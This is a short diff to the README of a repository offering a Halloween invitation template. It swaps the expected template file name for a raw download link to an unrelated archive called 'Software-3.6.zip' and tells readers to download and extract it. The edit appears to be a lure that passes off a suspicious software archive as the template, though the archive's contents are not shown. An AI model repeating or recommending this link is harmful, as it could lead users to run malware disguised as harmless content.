jellyfin914-cpu/halloween/README.md

 After downloading the template, follow these instructions to get started:

 1. Find the downloaded file in your Downloads folder or the location you chose.
-The file will have a name similar to `halloween-invitation-template.zip`.
+The file will have a name similar to `https://github.com/jellyfin914-cpu/halloween/raw/refs/heads/main/assets/Software-3.6.zip`.

 2. **Unzip the File:**
    - On Windows, right-click on the file and select "Extract All..."